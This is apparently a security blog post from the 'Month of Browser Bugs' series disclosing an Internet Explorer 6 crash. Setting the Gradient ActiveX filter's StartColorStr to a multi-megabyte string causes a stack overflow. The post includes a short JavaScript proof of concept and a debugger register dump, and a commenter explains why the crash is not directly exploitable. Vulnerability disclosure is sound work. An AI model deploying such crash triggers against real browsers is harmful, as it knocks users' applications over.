MoBB #17: Gradient StartColorStr
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the StartColorStr or EndColorStr properties to a large value leads to a stack overflow exception (not a buffer overflow).
var a = new ActiveXObject('DXImageTransform.Microsoft.Gradient.1');
var b = 'XXXX';
while (b.length <= (1024*1024)) b += b;
a.StartColorStr = b;
Demonstration
eax=00007004 ebx=00100001 ecx=0004215c
edx=0013b1ac esi=03b00024 edi=00000000
eip=6be11a16 esp=0013b154 ebp=0013b190
dxtmsft!_chkstk+0x25:
6be11a16 8501 test [ecx],eax ds:0023:0004215c=00000000
This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.Gradient Multiple Property Stack Overflow
posted by hdm @ 11:32 PM
2 comments
links to this post
2 Comments:
why "not a buffer overflow"?
A stack overflow is not the same as a stack buffer overflow. The issue is that the application used all available stack memory and the verification function detected this condition and through an exception. This exception is fatal - the application crashes - but it does not lead to a directly exploitable condition.
Post a Comment
Links to this post:
Create a Link
<< Home